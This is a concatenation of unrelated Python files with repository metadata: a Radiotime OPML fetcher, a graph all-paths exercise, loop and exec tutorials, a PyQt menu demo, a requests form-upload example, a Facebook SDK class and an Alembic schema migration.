                                                               ['http-get:*:audio/mpeg:*',
                                                                'http-get:*:audio/x-scpls:*'],
                                                               default=True)

    def retrieveItemsForOPML (self, parent, url):
        """Fetch *url* (an OPML document) and append its outlines to *parent*.

        Returns a twisted Deferred; on failure *parent* is flagged so the
        retrieval is retried on the next browse.
        """

        def append_outline(parent, outline):
            # Map one <outline> element to a backend item, recursing into
            # untyped grouping outlines.
            type = outline.get('type')

            if type is None:
                # This outline is just a classification item containing other outline elements
                # the corresponding item will a static Container
                text = outline.get('text')
                key = outline.get('key')
                external_id = None
                if external_id is None and key is not None:
                    external_id = "%s_%s" % (parent.external_id, key)
                # NOTE(review): outline_url is not defined in this branch, so
                # this fallback raises NameError if ever reached (outline with
                # no key).  Confirm intent — probably meant to fall back to text.
                if external_id is None:
                    external_id = outline_url

                item = Container(parent, text)
                item.external_id = external_id
                item.store = parent.store
                parent.add_child(item, external_id=external_id)

                sub_outlines = outline.findall('outline')
                for sub_outline in sub_outlines:
                    append_outline(item, sub_outline)

            elif type == 'link':
                # the corresponding item will a self-populating Container
                text = outline.get('text')
                outline_url = outline.get('URL')
                key = outline.get('key')
                guide_id = outline.get('guide_id')
                external_id = guide_id
                if external_id is None and key is not None:
                    external_id = "%s_%s" % (parent.external_id, key)
                if external_id is None:
                    external_id = outline_url

                item = LazyContainer(parent, text, external_id, self.refresh, self.retrieveItemsForOPML, url=outline_url)
                parent.add_child(item, external_id=external_id)

            elif type == 'audio':
                # a playable station leaf
                item = RadiotimeAudioItem(outline)
                parent.add_child(item, external_id=item.preset_id)

        def got_page(result):
            # *result* is the parsed OPML etree (produced by the
            # etree.fromstring callback below).
            self.info('connection to Radiotime service successful for url %s', url)
            outlines = result.findall('body/outline')
            for outline in outlines:
                append_outline(parent, outline)
            return True

        def got_error(error):
            # Fetch (or XML parse) failed: log and schedule a retry.
            self.warning("connection to Radiotime service failed for url %s", url)
            self.debug("%r", error.getTraceback())
            parent.childrenRetrievingNeeded = True  # we retry
            return Failure("Unable to retrieve items for url %s" % url)

        def got_xml_error(error):
            # Walking the parsed tree (got_page) failed: log and retry.
            self.warning("Data received from Radiotime service is invalid: %s", url)
            #self.debug("%r", error.getTraceback())
            print(error.getTraceback())
            parent.childrenRetrievingNeeded = True  # we retry
            return Failure("Unable to retrieve items for url %s" % url)

        # Deferred chain: fetch -> parse; got_error handles fetch/parse
        # failures, got_xml_error handles failures raised inside got_page.
        d = utils.getPage(url, )
        d.addCallback(etree.fromstring)
        d.addErrback(got_error)
        d.addCallback(got_page)
        d.addErrback(got_xml_error)
        return d
|
[
"raliclo@gmail.com"
] |
raliclo@gmail.com
|
630bdd5c13f4ec241b016ee6636bfe70af9b1448
|
01822d2ae38a95edcd188a51c377bb07b0a0c57d
|
/Assignments/Sprint3/FindAllPaths.py
|
faf38a0af57c11891b1ec51c5c26b3865f784c23
|
[
"MIT"
] |
permissive
|
mark-morelos/CS_Notes
|
bc298137971295023e5e3caf964fe7d3f8cf1af9
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
refs/heads/main
| 2023-03-10T11:56:52.691282
| 2021-03-02T15:09:31
| 2021-03-02T15:09:31
| 338,211,631
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,496
|
py
|
"""
Understand
Note: For some reason, it's failing one of the tests. I
think it's because the test case didn't sort their output.
In that case, the test is wrong :)
Drawing graphs via text are a pain, so I'm just gonna use the example given
Plan
1. Translate the problem into graph terminology
- Each index in the list given is a node
- Each subarray are the node's outgoing edges to its neighbors
2. Build your graph
- The graph is actually already built for us. We can traverse
the given list like a graph since
we have access to the node we're at and its neighbors.
3. Traverse the graph
- Any type of traversal would work, we just need to keep
track of the path that we've currently taken
- We add that path to the result once we reach the destination node
- Note that we don't need a visited set since we're
guaranteed that the graph is a DAG
Runtime: O(number of nodes^2)
Space: O(number of nodes^2)
Imagine a dense graph
"""
from collections import deque
def csFindAllPathsFromAToB(graph):
    """Return every path from node 0 to node len(graph)-1, sorted.

    *graph* is an adjacency list describing a DAG, so no visited set is
    needed — every walk terminates.
    """
    target = len(graph) - 1
    paths = []

    def walk(node, trail):
        # Extend *trail* along each outgoing edge; record it once the
        # destination is reached.
        for nxt in graph[node]:
            extended = trail + [nxt]
            if nxt == target:
                paths.append(extended)
            else:
                walk(nxt, extended)

    walk(0, [0])
    paths.sort()
    return paths
|
[
"makoimorelos@gmail.com"
] |
makoimorelos@gmail.com
|
d99058ae8efde20b0b9a94917310bf9294bf3d79
|
3d4094d6eca69329d4c6ba08e0c8ce79eedeb6b6
|
/starter/While.py
|
af86daef2ae3d6572815e944274601b1454dd277
|
[] |
no_license
|
agkozik/Python_Course
|
c9f3c8b68e60b452e57f43da7554c13daf386a0c
|
4b095bbc86f33999efe95127528b3e1d8bfded9f
|
refs/heads/master
| 2022-04-27T06:04:15.276472
| 2020-04-22T11:49:06
| 2020-04-22T11:49:06
| 255,082,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,286
|
py
|
# # ---------------------- while true ----------------------------
#
# message = ""
# while message != "exit":
# message = input("Type exit to exit: ")
#
# # ---------------------- while int true ----------------------------
# n = 1
# while n <= 3:
# print("n = ", n)
# n += 1
#
# # ---------------------- while enter a positive number --------
# number = 0
# while number <= 0:
# number = int(input("Enter a positive number: "))
# print("Your number is ", number)
# # ---------------------- Break --------------------------------
# i = 1
# while True:
# print("Iterataion ", i)
# i += 1
# if i == 10:
# break
# print("Loop has stopped")
# # ---------------------- Continue -----------------------------
# n = 0
# while n < 10:
# n += 1;
# if n == 5:
# print("Value 5 skipped because of continue operator")
# continue
# print(n)
# # ---------------------- While with Else ----------------------------
# ---------------------- While with Else ----------------------------
# Give the user three attempts to enter the correct password.
attempts_left = 3
while attempts_left > 0:
    attempts_left -= 1
    # Implicit string concatenation keeps the prompt on one logical line.
    password = input("Please, enter Password ["
                     "you have {} attempt(s) ]: ".format(attempts_left + 1))
    if password == '1234':
        print("Correct password, signing...")
        break
else:
    # while-else: runs only when the loop ends WITHOUT break,
    # i.e. all attempts were used up.
    print("You lost all attempts.")
|
[
"agkozik@gmail.com"
] |
agkozik@gmail.com
|
6c7d9885d0519d18a161ee398e1f83753b821006
|
65a32b8a8a97c126843d2cfe79c43193ac2abc23
|
/chapter9/local_var.py
|
1816492d4b38b735cc5262f0aabbb32c1c380b9e
|
[] |
no_license
|
zhuyuedlut/advanced_programming
|
9af2d6144e247168e492ddfb9af5d4a5667227c4
|
a6e0456dd0b216b96829b5c3cef11df706525867
|
refs/heads/master
| 2023-03-19T09:21:31.234000
| 2020-10-09T13:09:38
| 2020-10-09T13:09:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
# Demonstrations of how exec() interacts with module globals vs. function
# locals (CPython behaviour).

# Module-level exec: the executed assignment writes into the module's
# globals, so `b` really exists afterwards.
a = 20
exec('b = a + 1')
print(f'b = {b}')

# The commented-out version below raises NameError: inside a function,
# exec() writes into a snapshot dict of the locals, so `b` never becomes
# a real local variable.
# def test():
#     a = 20
#     exec('b = a + 1')
#     print(f'b = {b}')
#
# test()


def test():
    """Read the exec() result back out of the locals() dict."""
    a = 20
    # CPython: locals() returns the same dict exec() uses as its namespace,
    # so the exec'd assignment is visible through `loc`.
    loc = locals()
    exec('b = a + 1')
    b = loc['b']
    print(f't: b = {b}')


test()


def test_1():
    """exec() cannot rebind a real function local: x still prints 0."""
    x = 0
    exec('x += 1')
    print(f't1: x = {x}')


test_1()


def test_2():
    """Show the locals() snapshot before and after exec() mutates it."""
    x = 0
    loc = locals()
    print(f't2 before: {loc}')
    exec('x += 1')
    print(f't2 after: {loc}')
    print(f't2: x = {x}')


test_2()


def test_3():
    """Calling locals() again refreshes the snapshot from the real frame
    locals, discarding the value exec() had stored in the dict."""
    x = 0
    loc = locals()
    print(f't3: loc = {loc}')
    exec('x += 1')
    print(f't3: loc = {loc}')
    locals()
    print(f't3: loc = {loc}')


test_3()


def test_4():
    """The robust pattern: pass explicit globals/locals dicts to exec()
    and read the result back from the locals dict."""
    a = 20
    loc = {'a': a}
    glb = {}
    exec('b = a + 1', glb, loc)
    b = loc['b']
    print(f't4: b = {b}')


test_4()
|
[
"root@lyzdeMacBook.local"
] |
root@lyzdeMacBook.local
|
46bb827c374c723df2920b4765f45cafad5d8454
|
50402cc4388dfee3a9dbe9e121ef217759ebdba8
|
/demo/testPyQt/test3.py
|
6c42882d89fc51c0eae08cdf2e7c23b542794f04
|
[] |
no_license
|
dqyi11/SVNBackup
|
bd46a69ec55e3a4f981a9bca4c8340944d8d5886
|
9ad38e38453ef8539011cf4d9a9c0a363e668759
|
refs/heads/master
| 2020-03-26T12:15:01.155873
| 2015-12-10T01:11:36
| 2015-12-10T01:11:36
| 144,883,382
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 928
|
py
|
'''
Created on Apr 22, 2014
@author: walter
'''
import sys
from PyQt4 import QtGui
class Example(QtGui.QMainWindow):
    """Minimal PyQt4 main window demonstrating a menu bar with File > Exit."""

    def __init__(self):
        super(Example, self).__init__()
        self.initUI()

    def initUI(self):
        """Build the UI: an Exit action (Ctrl+Q), a status bar, a File menu."""
        exitAction = QtGui.QAction(QtGui.QIcon('exit.png'), '&Exit', self)
        exitAction.setShortcut('Ctrl+Q')
        exitAction.setStatusTip('Exit application')
        # Quit the whole application when the action is triggered.
        exitAction.triggered.connect(QtGui.qApp.quit)

        self.statusBar()

        menubar = self.menuBar()
        fileMenu = menubar.addMenu('&File')
        fileMenu.addAction(exitAction)

        # x, y, width, height
        self.setGeometry(300, 300, 300, 200)
        self.setWindowTitle('Menubar')
        self.show()
def main():
    """Create the window and run the Qt event loop until it exits."""
    app = QtGui.QApplication(sys.argv)
    # Keep a reference so the window object stays alive for the whole loop.
    ex = Example()
    sys.exit(app.exec_())


if __name__ == '__main__':
    main()
|
[
"walter@e224401c-0ce2-47f2-81f6-2da1fe30fd39"
] |
walter@e224401c-0ce2-47f2-81f6-2da1fe30fd39
|
c9ca634b1cfd0a70676f197430bc0680ce1077d0
|
8928c4745515ffecfc581da36df47b0789fb463f
|
/Chapter_9/formsub.py
|
51ea5e0fe04bad40167a6fc40016825b997f0e1d
|
[] |
no_license
|
iluxonchik/webscraping-with-python-book
|
72da36ba8fae016ccc20d44753ec4c46bc933dee
|
ffc5a1459778649d081c62812c8d3edbb2f120a9
|
refs/heads/master
| 2021-01-10T10:19:12.443341
| 2016-01-21T21:50:11
| 2016-01-21T21:50:11
| 48,058,040
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 302
|
py
|
import requests

# Submit a plain form POST (two text fields) and echo the server's response.
params = {'firstname':'hello', 'lastname':'there'}
r = requests.post("http://pythonscraping.com/files/processing.php", data=params)
print(r.text)

# Upload a file via multipart/form-data; the dict key ("uploadFile") must
# match the name of the form's file input field.
files = {'uploadFile': open('1.png', 'rb')}
r = requests.post("http://pythonscraping.com/files/processing2.php", files=files)
print(r.text)
|
[
"iluxon4ik@hotmail.com"
] |
iluxon4ik@hotmail.com
|
e7df1ffbd062f8f616fff956e0482311a709c86a
|
e4d4149a717d08979953983fa78fea46df63d13d
|
/Week6/Day5/DailyChallenge.py
|
68788690cf6a298238eff2f8a5648c48d64c3f7a
|
[] |
no_license
|
fayblash/DI_Bootcamp
|
72fd75497a2484d19c779775c49e4306e602d10f
|
a4e8f62e338df5d5671fd088afa575ea2e290837
|
refs/heads/main
| 2023-05-05T20:55:31.513558
| 2021-05-27T06:48:40
| 2021-05-27T06:48:40
| 354,818,813
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
import sqlite3 as sl
from time import time
import requests
import json

# Populate the local countries.db with countries 10..20 from the REST
# Countries API, timing the whole run.
connection = sl.connect("countries.db")
cursor = connection.cursor()

start = time()

# Fetch the full country list ONCE.  The original re-downloaded the entire
# list inside the loop — one full API request per country (11 requests).
data = requests.get("https://restcountries.eu/rest/v2/all")
countries = data.json()

for i in range(10, 21):
    country = countries[i]
    print(country['name'])
    # Parameterized query.  The original interpolated values straight into
    # the SQL string, which breaks on names containing quotes (e.g.
    # "Cote d'Ivoire") and is an SQL-injection hazard.
    cursor.execute(
        "INSERT INTO countries(name, capital, flag, subregion, population) "
        "VALUES (?, ?, ?, ?, ?)",
        (country['name'], country['capital'], country['flag'],
         country['subregion'], country['population']),
    )

connection.commit()
connection.close()

end = time()
print(end - start)
|
[
"fayblash@gmail.com"
] |
fayblash@gmail.com
|
277ca5faf223fee0254b99c950487e402e63cb75
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_untruth.py
|
f82b360189c64e1e50c3124e3fe683bea2162f45
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 354
|
py
|
# class header
class _UNTRUTH():
def __init__(self,):
self.name = "UNTRUTH"
self.definitions = [u'a statement that is not true: ', u'the fact that something is not true: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
97698fdcf4861c65a25ec9893aa57e5b52a06063
|
b6b2be9866fd16699ad5c30a21bbcb70755f1e57
|
/Experiments/_Legacy/Chicago/PartitionByDocThenClusterUsingLsa.py
|
6e174934f81ca58b1b992fbc3c3f4391ac23815f
|
[] |
no_license
|
simonhughes22/PythonNlpResearch
|
24a482c7036c568b063ec099176b393d45a0a86b
|
2bc2914ce93fcef6dbd26f8097eec20b7d0e476d
|
refs/heads/master
| 2022-12-08T17:39:18.332177
| 2019-10-26T12:48:33
| 2019-10-26T12:48:33
| 16,458,105
| 17
| 7
| null | 2022-12-07T23:38:17
| 2014-02-02T16:36:39
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,135
|
py
|
import Clusterer
import ClustersToFile
import SentenceData
import ListHelper
import Lsa
import MatrixHelper
import TfIdf
import WordTokenizer
import logging
import PartitionByCode
import CosineSimilarity
import collections
def find_closest_document(txtMatrixByCode, row):
    """Given a mapping {code -> LSA matrix (one per source document)}, return
    the code of the document closest to *row*, measured by the mean cosine
    similarity of *row* against every row of that document's matrix.
    (Max similarity would be an alternative aggregate.)

    Returns the string "ERROR" for an empty input row.
    """
    if len(row) == 0:
        return "ERROR"

    mean_sim_by_code = {}
    for code, matrix in txtMatrixByCode.items():
        sims = [CosineSimilarity.cosine_similarity(row, candidate)
                for candidate in matrix]
        mean_sim_by_code[code] = sum(sims) / len(matrix)

    # Highest mean similarity first; take its code.
    ranked = sorted(mean_sim_by_code.items(), key=lambda kv: kv[1], reverse=True)
    return ranked[0][0]
def train(num_lsa_topics, k):
    """Cluster SM-coded sentences within their closest source document.

    Pipeline: tokenize -> tf-idf -> LSA (num_lsa_topics dimensions);
    partition the LSA rows per source document; assign each SM-coded row to
    its closest document (mean cosine similarity); k-means within each
    document using roughly k/len(text_codes) clusters; write the cluster
    assignments to CSV files.

    Note: this module uses Python 2 syntax (print statement at the end).
    """
    logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)

    #TOKENIZE
    xs = SentenceData.SentenceData()
    tokenizer = WordTokenizer.WordTokenizer(min_word_count = 5)
    tokenized_docs = tokenizer.tokenize(xs.documents)

    #MAP TO VECTOR AND SEMANTIC SPACE
    tfidf = TfIdf.TfIdf(tokenized_docs)
    lsa = Lsa.Lsa(tfidf, num_topics = num_lsa_topics)
    full_lsa_matrix = MatrixHelper.gensim_to_python_mdarray(lsa.distance_matrix, num_lsa_topics)

    #TODO Partition into Docs by LSA sim
    txt_codes = xs.text_codes
    # split the k clusters evenly across the source documents
    clusters_per_text_code = int(round( k/ float((len(txt_codes)))))

    #Extract the sm code rows from LSA
    smCodeRows = ListHelper.filter_list_by_index(full_lsa_matrix, xs.sm_code_indices)
    smCodeClassifications = ListHelper.filter_list_by_index(xs.codes_per_document, xs.sm_code_indices)
    smCodeCategoryClassifications = ListHelper.filter_list_by_index(xs.categories_per_document, xs.sm_code_indices)

    # Dict of <code, list[list]]> - LSA row vectors
    logging.info("Partitioning LSA distance_matrix by Source Document")
    txtMatrixByCode = PartitionByCode.partition(full_lsa_matrix, xs, xs.text_codes)
    closest_docs = [find_closest_document(txtMatrixByCode, row) for row in smCodeRows]
    # group the SM-code rows by the document they were assigned to
    matrix_by_doc = collections.defaultdict(list)
    for i, doc in enumerate(closest_docs):
        matrix_by_doc[doc].append(smCodeRows[i])

    #Stores all cluster labels
    logging.info("Clustering within a document")
    all_smcode_labels = []
    label_offset = 0
    for doc in xs.text_codes:
        distance_matrix = matrix_by_doc[doc]
        #CLUSTER
        clusterer = Clusterer.Clusterer(clusters_per_text_code)
        labels = clusterer.Run(distance_matrix)
        # offset the labels so cluster ids stay globally unique across documents
        all_smcode_labels = all_smcode_labels + [int(l + label_offset) for l in labels]
        label_offset += clusters_per_text_code

    #OUTPUT
    file_name_code_clusters = "Partition_By_Doc_LSA_SMCODES_k-means_k_{0}_dims_{1}.csv".format(k, num_lsa_topics)
    ClustersToFile.clusters_to_file(file_name_code_clusters, all_smcode_labels, smCodeClassifications, "Chicago")
    file_name_category_clusters = "Partition_By_Doc_LSA_categories_k-means_k_{0}_dims_{1}.csv".format(k, num_lsa_topics)
    ClustersToFile.clusters_to_file(file_name_category_clusters, all_smcode_labels, smCodeCategoryClassifications, "Chicago")

    #TODO - filter the category and the docs per docs to the sm codes and output
    #file_name_category_clusters = "Partition_By_Doc_LSA_categories_k-means_k_{0}_dims_{1}.txt".format(k, num_lsa_topics)
    #ClustersToFile.clusters_to_file(file_name_category_clusters, all_smcode_labels, smCodeClassifications, "Chicago")

    print "Finished processing lsa clustering for dims: {0} and k: {1}".format(num_lsa_topics, k)
if __name__ == "__main__":
    # k = cluster size.  Example sweep (start, end, increment):
    #for k in range(40,41,1): #start, end, increment size
    #    train(300, k)
    train(num_lsa_topics = 300, k = 30)
|
[
"simon.hughes@dice.com"
] |
simon.hughes@dice.com
|
2408590522753e9cd86637c0677554589f285d76
|
c9d4d4c78703d009da11999e4e59b6a168a454a2
|
/examples/Learning Python The Hard Way/ex11_AskingQuestions.py
|
be33a059dc6c1cfcccb68bbc63af5f196c02ccc2
|
[
"MIT"
] |
permissive
|
AkiraKane/Python
|
23df49d7f7ae0f375e0b4ccfe4e1b6a077b1a52b
|
12e2dcb9a61e9ab0fc5706e4a902c48e6aeada30
|
refs/heads/master
| 2020-12-11T07:20:01.524438
| 2015-11-07T12:42:22
| 2015-11-07T12:42:22
| 47,440,128
| 1
| 0
| null | 2015-12-05T03:15:52
| 2015-12-05T03:15:51
| null |
UTF-8
|
Python
| false
| false
| 335
|
py
|
'''
Created on 2013-8-14
@author: Kelly Chan
Python Version: V3.3
Book: Learn Python The Hard Way
Ex11: Asking Questions
'''
# Ask three questions and read free-form answers from stdin.
print("How old are you?")
age = input()
print("How tall are you?")
height = input()
print("How much do you weigh?")
weight = input()
# %r prints the repr of each answer (quotes included) — as in the book's exercise.
print("So, you're %r old, %r tall and %r heavy." % (age, height, weight))
|
[
"kwailamchan@hotmail.com"
] |
kwailamchan@hotmail.com
|
238ec91f069f7201b85bb750838f5ebd9b18ecd9
|
ce083128fa87ca86c65059893aa8882d088461f5
|
/python/pytest-labs/.venv/lib/python3.6/site-packages/facebook_business/adobjects/productdaeventsamplesbatch.py
|
6155974b1405f7c8bc729960a751f6b815d8bc6d
|
[] |
no_license
|
marcosptf/fedora
|
581a446e7f81d8ae9a260eafb92814bc486ee077
|
359db63ff1fa79696b7bc803bcfa0042bff8ab44
|
refs/heads/master
| 2023-04-06T14:53:40.378260
| 2023-03-26T00:47:52
| 2023-03-26T00:47:52
| 26,059,824
| 6
| 5
| null | 2022-12-08T00:43:21
| 2014-11-01T18:48:56
| null |
UTF-8
|
Python
| false
| false
| 2,489
|
py
|
# Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from facebook_business.adobjects.abstractobject import AbstractObject
"""
This class is auto-generated.
For any issues or feature requests related to this class, please let us know on
github and we'll fix in our codegen framework. We'll not be able to accept
pull request for this class.
"""
class ProductDaEventSamplesBatch(
    AbstractObject,
):
    """Graph API object holding a batch of dynamic-ads event samples.

    Auto-generated by the facebook_business codegen framework — do not
    hand-edit the logic (see module header note).
    """

    def __init__(self, api=None):
        super(ProductDaEventSamplesBatch, self).__init__()
        self._isProductDaEventSamplesBatch = True
        self._api = api

    class Field(AbstractObject.Field):
        # API field names of this object.
        samples = 'samples'
        time_start = 'time_start'
        time_stop = 'time_stop'

    class AggregationType:
        # Allowed values for the aggregation_type enum parameter.
        content_id = 'CONTENT_ID'
        content_url = 'CONTENT_URL'

    class Event:
        # Allowed values for the event enum parameter.
        viewcontent = 'ViewContent'
        addtocart = 'AddToCart'
        purchase = 'Purchase'
        initiatecheckout = 'InitiateCheckout'
        search = 'Search'
        lead = 'Lead'
        addtowishlist = 'AddToWishlist'

    # Field name -> SDK type string, used by the base class for (de)serialization.
    _field_types = {
        'samples': 'list<Object>',
        'time_start': 'unsigned int',
        'time_stop': 'unsigned int',
    }

    @classmethod
    def _get_field_enum_info(cls):
        """Return the mapping of enum-typed fields to their allowed values."""
        field_enum_info = {}
        field_enum_info['AggregationType'] = ProductDaEventSamplesBatch.AggregationType.__dict__.values()
        field_enum_info['Event'] = ProductDaEventSamplesBatch.Event.__dict__.values()
        return field_enum_info
|
[
"marcosptf@yahoo.com.br"
] |
marcosptf@yahoo.com.br
|
4637ad8e57ec88e45fda29f4a08e4b0144d0f669
|
f0e11aeb7b5bd96c828cf39728eb2fa523f320df
|
/snapflow/migrations/versions/7d5638b5d74d_initial_migration.py
|
8b85094b11b08e55368d3320bb0b4bdb56eecc13
|
[
"BSD-3-Clause"
] |
permissive
|
sathya-reddy-m/snapflow
|
7bc1fa7de7fd93b81e5b0538ba73ca68e9e109db
|
9e9e73f0d5a3d6b92f528ef1e2840ad92582502e
|
refs/heads/master
| 2023-05-01T05:14:08.479073
| 2021-05-21T00:14:56
| 2021-05-21T00:14:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,528
|
py
|
"""Initial migration
Revision ID: 7d5638b5d74d
Revises:
Create Date: 2021-05-17 20:55:42.613348
"""
import snapflow
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "7d5638b5d74d"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Create the initial snapflow metadata schema (Alembic upgrade step).

    Tables with foreign keys are created after the tables they reference.
    Auto-generated migration — avoid hand-editing beyond review tweaks.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table(
        "_snapflow_data_block_metadata",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.String(length=128), nullable=False),
        sa.Column("inferred_schema_key", sa.String(length=128), nullable=True),
        sa.Column("nominal_schema_key", sa.String(length=128), nullable=True),
        sa.Column("realized_schema_key", sa.String(length=128), nullable=False),
        sa.Column("record_count", sa.Integer(), nullable=True),
        sa.Column("created_by_node_key", sa.String(length=128), nullable=True),
        sa.Column("deleted", sa.Boolean(), nullable=True),
        sa.PrimaryKeyConstraint("id"),
    )
    op.create_table(
        "_snapflow_data_function_log",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("node_key", sa.String(length=128), nullable=False),
        sa.Column("node_start_state", sa.JSON(), nullable=True),
        sa.Column("node_end_state", sa.JSON(), nullable=True),
        sa.Column("function_key", sa.String(length=128), nullable=False),
        sa.Column("function_params", sa.JSON(), nullable=True),
        sa.Column("runtime_url", sa.String(length=128), nullable=True),
        sa.Column("queued_at", sa.DateTime(), nullable=True),
        sa.Column("started_at", sa.DateTime(), nullable=True),
        sa.Column("completed_at", sa.DateTime(), nullable=True),
        sa.Column("error", sa.JSON(), nullable=True),
        sa.PrimaryKeyConstraint("id"),
    )
    op.create_table(
        "_snapflow_generated_schema",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("key", sa.String(length=128), nullable=False),
        sa.Column("definition", sa.JSON(), nullable=True),
        sa.PrimaryKeyConstraint("key"),
    )
    op.create_table(
        "_snapflow_node_state",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("node_key", sa.String(length=128), nullable=True),
        sa.Column("state", sa.JSON(), nullable=True),
        sa.PrimaryKeyConstraint("id"),
        sa.UniqueConstraint("env_id", "node_key"),
    )
    # References data_block_metadata and data_function_log above.
    op.create_table(
        "_snapflow_data_block_log",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("function_log_id", sa.Integer(), nullable=False),
        sa.Column("data_block_id", sa.String(length=128), nullable=False),
        sa.Column("stream_name", sa.String(length=128), nullable=True),
        sa.Column(
            "direction",
            sa.Enum("INPUT", "OUTPUT", name="direction", native_enum=False),
            nullable=False,
        ),
        sa.Column("processed_at", sa.DateTime(), nullable=False),
        sa.Column("invalidated", sa.Boolean(), nullable=True),
        sa.ForeignKeyConstraint(
            ["data_block_id"],
            ["_snapflow_data_block_metadata.id"],
        ),
        sa.ForeignKeyConstraint(
            ["function_log_id"],
            ["_snapflow_data_function_log.id"],
        ),
        sa.PrimaryKeyConstraint("id"),
    )
    op.create_table(
        "_snapflow_stored_data_block_metadata",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.String(length=128), nullable=False),
        sa.Column("name", sa.String(length=128), nullable=True),
        sa.Column("data_block_id", sa.String(length=128), nullable=False),
        sa.Column("storage_url", sa.String(length=128), nullable=False),
        sa.Column(
            "data_format",
            snapflow.core.metadata.orm.DataFormatType(length=128),
            nullable=False,
        ),
        sa.ForeignKeyConstraint(
            ["data_block_id"],
            ["_snapflow_data_block_metadata.id"],
        ),
        sa.PrimaryKeyConstraint("id"),
    )
    op.create_table(
        "_snapflow_alias",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("name", sa.String(length=128), nullable=True),
        sa.Column("data_block_id", sa.String(length=128), nullable=False),
        sa.Column("stored_data_block_id", sa.String(length=128), nullable=False),
        sa.ForeignKeyConstraint(
            ["data_block_id"],
            ["_snapflow_data_block_metadata.id"],
        ),
        sa.ForeignKeyConstraint(
            ["stored_data_block_id"],
            ["_snapflow_stored_data_block_metadata.id"],
        ),
        sa.PrimaryKeyConstraint("id"),
        sa.UniqueConstraint("env_id", "name"),
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop all snapflow metadata tables, in reverse dependency order."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table("_snapflow_alias")
    op.drop_table("_snapflow_stored_data_block_metadata")
    op.drop_table("_snapflow_data_block_log")
    op.drop_table("_snapflow_node_state")
    op.drop_table("_snapflow_generated_schema")
    op.drop_table("_snapflow_data_function_log")
    op.drop_table("_snapflow_data_block_metadata")
    # ### end Alembic commands ###
|
[
"kenvanharen@gmail.com"
] |
kenvanharen@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.